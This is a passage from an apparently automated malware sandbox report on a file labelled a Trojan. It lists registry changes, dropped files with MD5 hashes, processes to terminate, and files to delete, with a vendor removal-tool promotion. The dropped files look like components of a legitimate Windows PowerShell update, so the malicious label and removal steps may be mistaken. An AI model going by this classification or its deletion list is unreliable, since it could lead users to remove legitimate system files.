"UpdatedConfig" = "1C7F1721-EF2D-4A68-BCA0-1A1BD60A4988"
[HKLM\System\CurrentControlSet\Services\HTTP\Parameters\UrlAclInfo]
"http:// :5985/wsman/" = "01 00 04 80 00 00 00 00 00 00 00 00 00 00 00 00"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN\Plugin\WMI Provider]
"ConfigXML" = ""
The process wsmanhttpconfig.exe:3288 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "7D 7E 2B 49 69 28 A9 88 FC 9F CD 60 69 1C 7D 42"
The process %original file name%.exe:2044 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "07 7C DE A5 C3 37 D5 88 B3 30 02 24 5B 9F 3D 3E"
The Trojan deletes the following registry key(s):
[HKLM\SOFTWARE]
The Trojan deletes the following value(s) in system registry:
[HKLM\SOFTWARE]
"(Default)"
Dropped PE files
MD5 | File path |
---|---|
9859a26d5e72bbb0685af813b409d99d | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\WindowsXP-KB968930-x86-ENG.exe |
fc9a05096522bb6d7ceda62ea1707420 | c:\WINDOWS\$968930Uinstall_KB968930$\PSCustomSetupUtil.exe |
35efd8cd6549a4339cb2a28c8cfd6598 | c:\WINDOWS\$968930Uinstall_KB968930$\PSSetupNativeUtils.exe |
a39df582ca051afc8811fbd00db12f10 | c:\WINDOWS\$968930Uinstall_KB968930$\spuninst\spuninst.exe |
9a055da2f2819f155c33d47cd67a7c00 | c:\WINDOWS\$968930Uinstall_KB968930$\spuninst\updspapi.dll |
75c183e262bd4400eb0f20349f6ef383 | c:\WINDOWS\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management.resources\1.0.0.0_en_31bf3856ad364e35\Microsoft.BackgroundIntelligentTransfer.Management.resources.dll |
2f7fe3a781ba8c0a67c775f20e3e9f70 | c:\WINDOWS\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management\1.0.0.0__31bf3856ad364e35\Microsoft.BackgroundIntelligentTransfer.Management.dll |
4e2482e69baaf3a5b13db8101c063ebf | c:\WINDOWS\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Diagnostics.resources\1.0.0.0_en_31bf3856ad364e35\Microsoft.PowerShell.Commands.Diagnostics.resources.dll |
08e87e8abf7b41b28663dce817ce0ab6 | c:\WINDOWS\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Diagnostics\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Diagnostics.dll |
b87e087fc013225e2aa1cb60c080647d | c:\WINDOWS\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management.resources\1.0.0.0_en_31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.resources.dll |
f3ac3f844f90380aab2b4c0836c4288f | c:\WINDOWS\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll |
1ce73fb3f88c716cfc3fd550547d2b35 | c:\WINDOWS\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility.resources\1.0.0.0_en_31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.resources.dll |
dfeb401cc051e5da721c584ff6a90f88 | c:\WINDOWS\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll |
36ff641f37918f2cca98e7f407ac4d75 | c:\WINDOWS\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost.resources\1.0.0.0_en_31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.resources.dll |
3991b7fa452a9c9c291c06365a236792 | c:\WINDOWS\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll |
37bed865557084dd9988350ab1675e0b | c:\WINDOWS\assembly\GAC_MSIL\Microsoft.PowerShell.Editor.resources\1.0.0.0_en_31bf3856ad364e35\Microsoft.PowerShell.Editor.resources.dll |
208fa9d0ebe2ceb9616042772e96598e | c:\WINDOWS\assembly\GAC_MSIL\Microsoft.PowerShell.Editor\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Editor.dll |
108500a98b9a2f66823e7615398fc87b | c:\WINDOWS\assembly\GAC_MSIL\Microsoft.PowerShell.GPowerShell.resources\1.0.0.0_en_31bf3856ad364e35\Microsoft.PowerShell.GPowerShell.resources.dll |
d4eefccdc3de6ced901535fa4153c491 | c:\WINDOWS\assembly\GAC_MSIL\Microsoft.PowerShell.GPowerShell\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.GPowerShell.dll |
5a69fb5d686f863e0e13268d671ef16d | c:\WINDOWS\assembly\GAC_MSIL\Microsoft.PowerShell.GraphicalHost.resources\1.0.0.0_en_31bf3856ad364e35\Microsoft.PowerShell.GraphicalHost.resources.dll |
3eab4dbdc290edc4d53fe77f1fdb9e59 | c:\WINDOWS\assembly\GAC_MSIL\Microsoft.PowerShell.GraphicalHost\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.GraphicalHost.dll |
c7a0d1321a67a2afd330c5fbe79befd1 | c:\WINDOWS\assembly\GAC_MSIL\Microsoft.PowerShell.Security.resources\1.0.0.0_en_31bf3856ad364e35\Microsoft.PowerShell.Security.resources.dll |
53a9d748ef09920a0d06da2583c298ad | c:\WINDOWS\assembly\GAC_MSIL\Microsoft.PowerShell.Security\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll |
6372ea7d2aced7185183cf3fcdd3577b | c:\WINDOWS\assembly\GAC_MSIL\Microsoft.WSMan.Management.resources\1.0.0.0_en_31bf3856ad364e35\Microsoft.WSMan.Management.resources.dll |
1a4e900c2fe3cd31d10107670d184fe6 | c:\WINDOWS\assembly\GAC_MSIL\Microsoft.WSMan.Management\1.0.0.0__31bf3856ad364e35\Microsoft.WSMan.Management.dll |
f7da27672d2e4c21a1f996ee31de0dbf | c:\WINDOWS\assembly\GAC_MSIL\Microsoft.WSMan.Runtime\1.0.0.0__31bf3856ad364e35\Microsoft.WSMan.Runtime.dll |
2286b57ecc2d32d24049c51989084268 | c:\WINDOWS\assembly\GAC_MSIL\System.Management.Automation.resources\1.0.0.0_en_31bf3856ad364e35\System.Management.Automation.resources.dll |
4d8ab4fad244f7985d8c59d456e026d7 | c:\WINDOWS\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll |
930cdc3163f4d4a6bd52f96896e9fa44 | c:\WINDOWS\assembly\NativeImages_v2.0.50727_32\Microsoft.Backgroun#\fd3edcdfa9ce60abac35208146184495\Microsoft.BackgroundIntelligentTransfer.Management.ni.dll |
e27a37cfbcff4c9941e73c9a3e762d0c | c:\WINDOWS\assembly\NativeImages_v2.0.50727_32\Microsoft.PowerShel#\13fc3daef585098f11911f8f72ac1cea\Microsoft.PowerShell.Commands.Diagnostics.ni.dll |
85d7ab466d0577c49fc9879107ec7ef5 | c:\WINDOWS\system32\WindowsPowerShell\v1.0\CompiledComposition.Microsoft.PowerShell.GPowerShell.dll |
173d3dd1425a8e33fa1d4ed71067a3a2 | c:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\BitsTransfer\microsoft.backgroundintelligenttransfer.management.interop.dll |
df4217ddb34a0b73dc7aac7829371c0c | c:\WINDOWS\system32\WindowsPowerShell\v1.0\powershell.exe |
fe7bc06af17d7cd8fb8e6d72d72453b8 | c:\WINDOWS\system32\WindowsPowerShell\v1.0\powershell.exe.mui |
36b6f71b6d7d280302b348145db05a9f | c:\WINDOWS\system32\WindowsPowerShell\v1.0\powershell_ise.exe |
cb3a534127f37d0fa1f556dbb76575d3 | c:\WINDOWS\system32\WindowsPowerShell\v1.0\powershell_ise.resources.dll |
95b7f12a557dedac5e4a1e9afa5e73ab | c:\WINDOWS\system32\WindowsPowerShell\v1.0\pspluginwkr.dll |
a94243b797377ba03b63fc716c13bcf5 | c:\WINDOWS\system32\WindowsPowerShell\v1.0\pwrshmsg.dll |
7943a80f1a6fd37969aacd411b511f91 | c:\WINDOWS\system32\WindowsPowerShell\v1.0\pwrshsip.dll |
2c9c9ae86eb2b4e78c8e09deb7509a63 | c:\WINDOWS\system32\WsmAuto.dll |
67146d3606be1111a39f0fd61f47e9b6 | c:\WINDOWS\system32\WsmRes.dll |
18f347402da544a780949b8fdf83351b | c:\WINDOWS\system32\WsmSvc.dll |
296e6992278fea7140d88b603e6c2a8a | c:\WINDOWS\system32\WsmWmiPl.dll |
8c386819bf5b39d7a4b274d0b55f87a5 | c:\WINDOWS\system32\pwrshplugin.dll |
84e025b1259c66315f4d45a6caecacc9 | c:\WINDOWS\system32\wevtfwd.dll |
cd17705af8e53a82facb545a213ab09c | c:\WINDOWS\system32\winrmprov.dll |
afdf7654880ce23005014895b129d948 | c:\WINDOWS\system32\winrs.exe |
3e9b11880ae4a8ff399ce0573c82655b | c:\WINDOWS\system32\winrscmd.dll |
62021e3e6ba13d72cf5cc1047cfac991 | c:\WINDOWS\system32\winrshost.exe |
b84092e52861a026fc83bcede4a7abfa | c:\WINDOWS\system32\winrsmgr.dll |
35bc7c49676e5ab617ef94dc9854a6f1 | c:\WINDOWS\system32\winrssrv.dll |
972916faac89c4aa978952b30f478e81 | c:\WINDOWS\system32\wsmanhttpconfig.exe |
23ce21efc2ae95700f2b1f9582fe3867 | c:\WINDOWS\system32\wsmplpxy.dll |
faa2fcc6853e5123e05dccc5919657e2 | c:\WINDOWS\system32\wsmprovhost.exe |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
No anomalies have been detected.
Propagation
Removals
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Terminate malicious process(es) (How to End a Process With the Task Manager):
mofcomp.exe:3308
WindowsXP-KB968930-x86-ENG.exe:2232
ngen.exe:216
ngen.exe:2432
ngen.exe:1308
ngen.exe:2440
ngen.exe:1904
ngen.exe:1712
ngen.exe:1980
ngen.exe:1944
ngen.exe:652
ngen.exe:1560
ngen.exe:816
ngen.exe:1236
ngen.exe:560
ngen.exe:2448
ngen.exe:2424
ngen.exe:1916
ngen.exe:1624
ngen.exe:4076
ngen.exe:1240
ngen.exe:2000
ngen.exe:500
ngen.exe:1572
ngen.exe:1380
update.exe:2296
mscorsvw.exe:2860
mscorsvw.exe:4088
mscorsvw.exe:2652
mscorsvw.exe:2296
mscorsvw.exe:3888
mscorsvw.exe:2948
mscorsvw.exe:3296
mscorsvw.exe:1904
mscorsvw.exe:1632
mscorsvw.exe:3044
mscorsvw.exe:2920
mscorsvw.exe:2428
mscorsvw.exe:1096
mscorsvw.exe:2816
mscorsvw.exe:2420
mscorsvw.exe:1948
mscorsvw.exe:2728
mscorsvw.exe:2956
mscorsvw.exe:2764
mscorsvw.exe:3680
mscorsvw.exe:3440
mscorsvw.exe:1388
mscorsvw.exe:2256
mscorsvw.exe:1152
PSCustomSetupUtil.exe:3592
PSCustomSetupUtil.exe:3496
PSCustomSetupUtil.exe:3828
PSCustomSetupUtil.exe:2096
PSCustomSetupUtil.exe:3732
PSCustomSetupUtil.exe:3652
PSCustomSetupUtil.exe:3692
PSCustomSetupUtil.exe:3856
PSCustomSetupUtil.exe:2176
PSCustomSetupUtil.exe:2072
PSCustomSetupUtil.exe:2288
PSCustomSetupUtil.exe:3628
PSCustomSetupUtil.exe:3400
PSCustomSetupUtil.exe:3520
PSCustomSetupUtil.exe:3756
PSCustomSetupUtil.exe:3544
PSCustomSetupUtil.exe:3780
PSCustomSetupUtil.exe:3464
PSCustomSetupUtil.exe:3332
PSCustomSetupUtil.exe:3376
PSCustomSetupUtil.exe:3424
PSCustomSetupUtil.exe:2168
PSCustomSetupUtil.exe:1060
PSCustomSetupUtil.exe:2064
PSCustomSetupUtil.exe:2252
PSCustomSetupUtil.exe:2104
PSSetupNativeUtils.exe:2572
regsvr32.exe:1968
regsvr32.exe:404
wsmanhttpconfig.exe:3220
wsmanhttpconfig.exe:3288
%original file name%.exe:2044 - Delete the original Trojan file.
- Delete or disinfect the following files created/modified by the Trojan:
%System%\wbem\Logs\mofcomp.log (1814 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\tmpCF.tmp (1 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\winrm.cmd (35 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\about_requires.help.txt (2 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\about_script_internationalization.help.txt (9 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\about_redirection.help.txt (2 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\microsoft.wsman.runtime.dll (33 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\pwrshsip.dll (24 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\about_join.help.txt (2 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\microsoft.wsman.management.dll (5010 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\about_pssnapins.help.txt (6 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\update\eula.txt (586 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\about_escape_characters.help.txt (2 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\about_windows_powershell_2.0.help.txt (453 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\about_properties.help.txt (7 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\about_format.ps1xml.help.txt (17 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\microsoft.powershell.security.dll-help.xml (1797 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\getevent.types.ps1xml (15 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\about_ws-management_cmdlets.help.txt (405 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\about_prompts.help.txt (7 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\winrscmd.dll (2907 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\winrs.exe (1154 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\winrsmgr.dll (2 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\diagnostics.format.ps1xml (590 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\update\spcustom.dll (23 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\about_script_blocks.help.txt (3 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\about_assignment_operators.help.txt (379 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\windowsremoteshell.adm (12 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\about_foreach.help.txt (10 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\bitstransfer.psd1 (950 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\about_while.help.txt (2 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\registry.format.ps1xml (20 bytes)
C:\$Directory (800 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\pwrshmsg.dll (4 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\about_for.help.txt (146 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\about_preference_variables.help.txt (37 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\about_logical_operators.help.txt (2 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\windowsremotemanagement.adm (574 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\update\kb968930xp.cat (512 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\system.management.automation.dll (38414 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\microsoft.wsman.management.dll-help.xml (8740 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\compiledcomposition.microsoft.powershell.gpowershell.dll (1737 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\about_command_precedence.help.txt (8 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\about_core_commands.help.txt (221 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\about_bits_cmdlets.help.txt (7 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\microsoft.powershell.editor.resources.dll (562 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\about_remote.help.txt (7 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\about_comment_based_help.help.txt (595 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\$shtdwn$.req (788 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\powershell.exe (7339 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\microsoft.powershell.consolehost.dll (3118 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\wsmanhttpconfig.exe (3009 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\about_session_configurations.help.txt (276 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\about_split.help.txt (10 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\microsoft.powershell.editor.dll (14450 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\winrm.vbs (2727 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\wtrinstaller.ico (4803 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\default.help.txt (2 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\certificate.format.ps1xml (155 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\microsoft.powershell.graphicalhost.dll (4408 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\microsoft.powershell.commands.diagnostics.dll (998 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\microsoft.powershell.gpowershell.resources.dll (408 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\about_profiles.help.txt (457 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\about_arrays.help.txt (8 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\about_pipelines.help.txt (411 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\about_job_details.help.txt (824 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\wsmwmipl.dll (2816 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\winrshost.exe (22 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\about_wildcards.help.txt (3 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\about_remote_output.help.txt (887 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\about_return.help.txt (3 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\about_do.help.txt (2 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\about_locations.help.txt (794 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\about_signing.help.txt (12 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\microsoft.powershell.commands.management.dll (3386 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\wsmauto.dll (1842 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\types.ps1xml (2510 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\about_functions.help.txt (586 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\about_parsing.help.txt (2 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\about_ref.help.txt (1 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\about_if.help.txt (3 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\about_commonparameters.help.txt (12 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\about_command_syntax.help.txt (5 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\microsoft.powershell.commands.utility.dll-help.xml (20810 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\about_operators.help.txt (770 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\about_debuggers.help.txt (21 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\about_remote_jobs.help.txt (13 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\wsmprovhost.exe (657 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\about_aliases.help.txt (6 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\microsoft.powershell.commands.management.dll-help.xml (28236 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\about_scripts.help.txt (12 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\about_break.help.txt (792 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\about_try_catch_finally.help.txt (7 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\about_type_operators.help.txt (5 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\pwrshplugin.dll (802 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\wsmtxt.xsl (2 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\microsoft.powershell.commands.diagnostics.resources.dll (470 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\about_functions_advanced_parameters.help.txt (962 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\about_comparison_operators.help.txt (11 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\bitstransfer.format.ps1xml (16 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\about_jobs.help.txt (12 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\about_trap.help.txt (10 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\about_quoting_rules.help.txt (659 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\wevtfwd.dll (3351 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\pssetupnativeutils.exe (9 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\about_pssession_details.help.txt (9 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\powershell_ise.exe (2526 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\spuninst.exe (3787 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\about_execution_policies.help.txt (13 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\system.management.automation.resources.dll (3153 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\winrm.ini (1956 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\powershell.exe.mui (10 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\about_arithmetic_operators.help.txt (168 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\about_wmi_cmdlets.help.txt (8 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\about_types.ps1xml.help.txt (481 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\about_pssessions.help.txt (9 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\winrmprov.dll (591 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\update\update.exe (10748 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\about_functions_cmdletbindingattribute.help.txt (3 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\about_environment_variables.help.txt (417 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\about_remote_requirements.help.txt (6 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\about_regular_expressions.help.txt (5 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\microsoft.powershell.consolehost.dll-help.xml (900 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\wsmplpxy.dll (603 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\about_switch.help.txt (489 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\about_hash_tables.help.txt (6 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\microsoft.backgroundintelligenttransfer.management.resources.dll (7 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\about_data_sections.help.txt (5 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\spmsg.dll (495 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\about_special_characters.help.txt (3 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\about_line_editing.help.txt (1 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\about_throw.help.txt (5 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\about_remote_faq.help.txt (775 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\microsoft.powershell.commands.diagnostics.dll-help.xml (2301 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\about_automatic_variables.help.txt (14 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\wsman.format.ps1xml (837 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\microsoft.backgroundintelligenttransfer.management.dll-help.xml (2472 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\wsmpty.xsl (1 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\help.format.ps1xml (3947 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\update\update.inf (2457 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\filesystem.format.ps1xml (133 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\microsoft.powershell.gpowershell.dll (9738 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\about_parameters.help.txt (9 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\powershellcore.format.ps1xml (1492 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\pspluginwkr.dll (1756 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\about_reserved_words.help.txt (1 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\about_functions_advanced.help.txt (3 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\about_remote_troubleshooting.help.txt (146 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\microsoft.powershell.commands.utility.resources.dll (508 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\about_functions_advanced_methods.help.txt (9 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\about_methods.help.txt (6 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\wsmsvc.dll (15909 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\update\updspapi.dll (5940 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\powershell_ise.resources.dll (4 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\dotnettypes.format.ps1xml (266 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\microsoft.powershell.commands.management.resources.dll (508 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\powershelltrace.format.ps1xml (344 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\microsoft.powershell.consolehost.resources.dll (778 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\spupdsvc.exe (287 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\microsoft.backgroundintelligenttransfer.management.interop.dll (1532 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\about_providers.help.txt (59 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\pscustomsetuputil.exe (316 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\about_modules.help.txt (13 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\winrmprov.mof (789 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\eventforwarding.adm (2 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\about_variables.help.txt (6 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\about_objects.help.txt (2 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\microsoft.wsman.management.resources.dll (13 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\about_transactions.help.txt (1011 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\profile.ps1 (772 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\system.management.automation.dll-help.xml (16567 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\about_language_keywords.help.txt (11 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\about_windows_powershell_ise.help.txt (6 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\update\update.ver (14 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\winrssrv.dll (12 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\microsoft.powershell.security.resources.dll (9 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\about_path_syntax.help.txt (5 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\about_scopes.help.txt (76 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\windowspowershellhelp.chm (26041 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\about_continue.help.txt (1 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\wsmauto.mof (4 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\microsoft.powershell.graphicalhost.resources.dll (16 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\about_eventlogs.help.txt (5 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\wsmres.dll (6164 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\importallmodules.psd1 (438 bytes)
C:\6c23dc75f57bb04ba83a51fb3e\about_history.help.txt (3 bytes)
%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (484 bytes)
%System%\SETBF.tmp (42 bytes)
%WinDir%\ocmsn.log (7791 bytes)
%System%\WindowsPowerShell\v1.0\SET86.tmp (4 bytes)
%System%\WindowsPowerShell\v1.0\SETB7.tmp (16 bytes)
%System%\SET12.tmp (1281 bytes)
%System%\WindowsPowerShell\v1.0\SET3E.tmp (1281 bytes)
%System%\GroupPolicy\Adm\SET35.tmp (12 bytes)
%System%\SETC.tmp (2105 bytes)
%System%\WindowsPowerShell\v1.0\SET58.tmp (36 bytes)
%System%\WindowsPowerShell\v1.0\SET51.tmp (14022 bytes)
%System%\WindowsPowerShell\v1.0\SET84.tmp (11 bytes)
%System%\WindowsPowerShell\v1.0\SET46.tmp (601 bytes)
%System%\WindowsPowerShell\v1.0\SET41.tmp (601 bytes)
%System%\WindowsPowerShell\v1.0\Modules\BitsTransfer\SETC0.tmp (950 bytes)
%System%\WindowsPowerShell\v1.0\SET8C.tmp (9 bytes)
%System%\WindowsPowerShell\v1.0\SETCC.tmp (601 bytes)
%System%\WindowsPowerShell\v1.0\SETC9.tmp (1425 bytes)
